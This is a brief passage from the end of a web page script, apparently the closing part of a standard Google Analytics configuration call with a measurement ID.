'G-4RZWBJKYF3'); }); </script>
